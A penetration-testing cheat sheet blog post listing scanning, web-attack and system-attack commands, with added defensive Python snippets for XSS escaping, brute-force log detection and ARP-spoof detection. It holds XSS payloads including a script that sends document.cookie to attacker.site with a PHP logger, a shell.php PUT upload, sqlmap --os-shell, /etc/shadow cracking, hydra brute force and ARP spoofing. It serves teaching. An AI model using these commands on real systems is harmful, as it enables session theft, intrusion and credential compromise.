
Junior Penetration Tester cheat sheet

Oleg Mitrakhovich - July 8, 2021

Introduction

There are lots of resources out there that can help you start in penetration testing. One of them is the WYWM potential platform, alongside the various junior penetration-testing certifications. Recently I was able to certify as a junior penetration tester, and I realized that at a junior level there are not that many commands and tools a junior penetration tester needs to know. In fact, I was able to summarize all of them in the form of a cheat sheet. These are the commands I use every day, and having this cheat sheet saves a lot of time. If you know all the commands and tools below, this cheat sheet will prepare you for your first junior penetration-testing certification.

Disclaimer

Penetration testing is a lot more than just throwing commands against a machine. 

I would highly suggest taking an ethical hacking course before attempting to use these commands/tools in real-life engagements. Neither I nor the company is responsible for the ill usage of these commands/tools; they are presented solely for educational purposes.

Also, before attempting any certification, you should practise all of these commands in some sort of a lab environment and understand how these tools/commands work together.

Let's begin!

Enumeration

Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.

Nmap Scans

nmap Scan (Full)

    nmap -sC -sV -p- 10.10.10.10

nmap Scan (UDP Partial)

    nmap -sU -sV 10.10.10.10

nmap Scan (Partial)

    nmap -sC -sV 10.10.10.10

OS Detection

    nmap -O 10.10.10.10

whois

    whois site.com

Host Discovery

    fping -a -g 10.10.10.0/24 2>/dev/null
    nmap -sn 10.10.10.0/24    # ping sweep only, skips the port scan phase
    netdiscover -r 10.10.10.0/24

Web Applications

The next set of commands should be used when attacking a web application. Actually understanding what these do, and not just throwing them against your target, is really important.

Banner Grabbing

    nc -v 10.10.10.10 <port#>
    HEAD / HTTP/1.0

    (press the enter key twice)

OpenSSL for HTTPS services

    openssl s_client -connect 10.10.10.10:443
    HEAD / HTTP/1.0

Cross Site Scripting (XSS)

    <script>alert('xss');</script>
    <script>alert(document.cookie)</script>
    <img src="javascript:alert(1)">
    http://victim.site/search.php?find=<payload>

To send cookie to attacker-controlled site:

    <script>
    var i = new Image();
    i.src = "http://attacker.site/log.php?q=" + document.cookie;
    </script>

The log.php page on the attacker's site:

    <?php
    $filename = "/tmp/log.txt";
    $fp = fopen($filename, 'a');
    $cookie = $_GET['q'];
    fwrite($fp, $cookie);
    fclose($fp);
    ?>
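On the defending side, every payload above is neutralised by two habits: escape untrusted text on output, and only allow http(s) or relative URLs in attributes such as src. This is an added example, not code from the original post; search.php is the hypothetical endpoint from the URL above and the payload list is constructed from the forms shown there.

```python
import html
from typing import Optional
from urllib.parse import urlparse

# Constructed sample inputs, the same payload shapes listed above.
PAYLOADS = [
    "<script>alert('xss');</script>",
    "<script>alert(document.cookie)</script>",
    '<img src="javascript:alert(1)">',
]

def escape_for_html(untrusted: str) -> str:
    """Encode untrusted text for an HTML body: < > & " ' become entities,
    so a reflected 'find' parameter is shown as text, never parsed as a tag."""
    return html.escape(untrusted, quote=True)

def render_search_result(find: str) -> str:
    """What search.php should do with its parameter: escape on output."""
    return "<p>Results for: " + escape_for_html(find) + "</p>"

def safe_image_url(url: str) -> Optional[str]:
    """Allow only http(s) or relative URLs in a src attribute.
    Tabs/newlines are removed first because browsers ignore them inside a
    scheme, so 'java\\tscript:' would otherwise slip past the check."""
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    scheme = urlparse(cleaned).scheme.lower()
    if scheme not in ("", "http", "https"):
        return None
    return html.escape(cleaned, quote=True)

def is_inert(escaped: str) -> bool:
    """Check helper: no raw angle bracket or quote survived the encoding."""
    return not any(ch in escaped for ch in "<>\"'")
```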

HTTPRINT

    httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt

HTTP Verbs

    GET, POST, HEAD, PUT, DELETE, OPTIONS

Sending an OPTIONS request shows which other verbs the server accepts:

    nc 10.10.10.10 80
    OPTIONS / HTTP/1.0

To upload a file over HTTP, use the PUT verb. First get the size of the file in bytes (Content-Length counts bytes, so use -c rather than -m):

    wc -c shell.php

The command above gives the size of the payload, then send the following:

    PUT /shell.php HTTP/1.0
    Content-Type: text/html
    Content-Length: <payload size>

Directory and File Scanning

    dirb http://10.10.10.10
    dirsearch.py -u http://10.10.10.10 -e '*'
    gobuster dir -u http://10.10.10.10 -w /path/to/wordlist.txt

    dirbuster
    nikto -h 10.10.10.10

SQLMAP

    sqlmap -u http://10.10.10.10 -p <parameter>
    sqlmap -u http://10.10.10.10 --data "<POST string>" -p <parameter>
    sqlmap -u http://10.10.10.10 --os-shell
    sqlmap -u http://10.10.10.10 --dump

Typical order to run them in:

    # to list the databases
    sqlmap -u http://10.10.10.10 --dbs

    # to list the tables of one database
    sqlmap -u http://10.10.10.10 -D <name of db> --tables

    # to dump one table
    sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump

System Attacks

This portion covers system attacks. It is very important to understand how to execute brute-force attacks and how to run exploits.

Password Attacks

    unshadow /etc/passwd /etc/shadow > password.txt
    john password.txt
    john --show password.txt

Hash Cracking

    john --wordlist=/path/to/wordlist --users=users.txt hashfile

Brute Forcing with Hydra

    hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
    hydra -L users.txt -P pass.txt telnet://10.10.10.10
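From the blue-team side, a wordlist run like the hydra commands above leaves a very recognisable trail in sshd's log: many failed passwords for many different usernames from one address within seconds. This added example (not part of the original post) parses constructed /var/log/auth.log lines and flags a source once it crosses a failure threshold inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

# Constructed sshd lines in auth.log format (not real logs): one source tries five usernames in three seconds, a real user mistypes once.
SAMPLE_AUTH_LOG = """\
Jul  8 10:00:01 host sshd[2101]: Failed password for invalid user admin from 10.10.10.50 port 40122 ssh2
Jul  8 10:00:02 host sshd[2102]: Failed password for root from 10.10.10.50 port 40123 ssh2
Jul  8 10:00:02 host sshd[2103]: Failed password for invalid user test from 10.10.10.50 port 40124 ssh2
Jul  8 10:00:03 host sshd[2104]: Failed password for oleg from 10.10.10.50 port 40125 ssh2
Jul  8 10:00:03 host sshd[2105]: Failed password for invalid user guest from 10.10.10.50 port 40126 ssh2
Jul  8 10:09:10 host sshd[2140]: Failed password for oleg from 192.168.0.20 port 51000 ssh2
Jul  8 10:09:40 host sshd[2141]: Accepted password for oleg from 192.168.0.20 port 51001 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_failures(log: str, year: int = 2021) -> Iterator[Tuple[datetime, str, str]]:
    """Yield (timestamp, source_ip, username) per failed-password line; syslog has no year, so the caller supplies it."""
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"]

def detect_bruteforce(log: str, threshold: int = 5, window: timedelta = timedelta(minutes=1)) -> Dict[str, dict]:
    """Flag each source IP that reaches `threshold` failures inside a sliding `window`.
    Many distinct usernames in that window is the wordlist signature (-L users.txt -P pass.txt), not a typo."""
    by_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, ip, user in parse_failures(log):
        by_ip[ip].append((ts, user))
    alerts: Dict[str, dict] = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = {u for _, u in events[start:end + 1]}
                alerts[ip] = {"failures": end - start + 1, "distinct_users": len(users)}
                break
    return alerts
```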

ARP spoofing

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
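A host under ARP spoofing sees its cache change: the gateway's IP suddenly resolves to a MAC that another address on the segment already owns. This added example (not code from the original post) compares two constructed `arp -n` snapshots and reports both symptoms; the addresses and MACs are made up.

```python
from collections import defaultdict
from typing import Dict, List

# Constructed `arp -n` snapshots (not real captures). In the second one the gateway
# 10.10.10.1 now resolves to the MAC of 10.10.10.99, and an incomplete entry appears.
SNAPSHOT_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.10.10.1               ether   00:50:56:aa:bb:01   C                     eth0
10.10.10.12              ether   00:0c:29:ab:cd:ef   C                     eth0
10.10.10.99              ether   00:0c:29:12:34:56   C                     eth0
"""
SNAPSHOT_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.10.10.1               ether   00:0c:29:12:34:56   C                     eth0
10.10.10.12              ether   00:0c:29:ab:cd:ef   C                     eth0
10.10.10.13                      (incomplete)                              eth0
10.10.10.99              ether   00:0c:29:12:34:56   C                     eth0
"""

def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> MAC from `arp -n` output; skip the header and incomplete entries."""
    table: Dict[str, str] = {}
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 3 and parts[1] == "ether":
            table[parts[0]] = parts[2].lower()
    return table

def arp_anomalies(before: str, after: str) -> List[str]:
    """Report IPs whose MAC changed between snapshots and MACs claiming several IPs."""
    old, new = parse_arp_table(before), parse_arp_table(after)
    alerts: List[str] = []
    for ip, mac in new.items():
        if ip in old and old[ip] != mac:
            alerts.append(f"{ip} changed from {old[ip]} to {mac}")
    owners: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in new.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {', '.join(sorted(ips))}")
    return alerts
```

The same comparison works on periodic snapshots from a cron job; a static ARP entry for the gateway is the usual mitigation on hosts that cannot rely on switch-side dynamic ARP inspection.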

Metasploit

    search <name of exploit>
    use <name of exploit>
    info
    show options
    show advanced
    set RHOST 10.10.10.10
    set payload <name of payload>
    exploit

    background
    sessions -l
    sessions -i 1

Routing

I would practise routing if you are planning to take any junior penetration tester certification. Here is the command to remember:

    ip route add ROUTETO via ROUTEFROM

Example:

    ip route add 10.10.10.10 via 192.168.0.1
